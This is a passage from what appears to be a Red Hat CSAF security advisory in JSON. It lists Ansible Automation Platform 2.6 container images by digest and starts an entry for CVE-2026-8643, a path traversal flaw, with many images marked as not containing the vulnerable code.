"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2026-8643",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-04-22T23:09:35+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2460927"
}
],
"notes": [
{
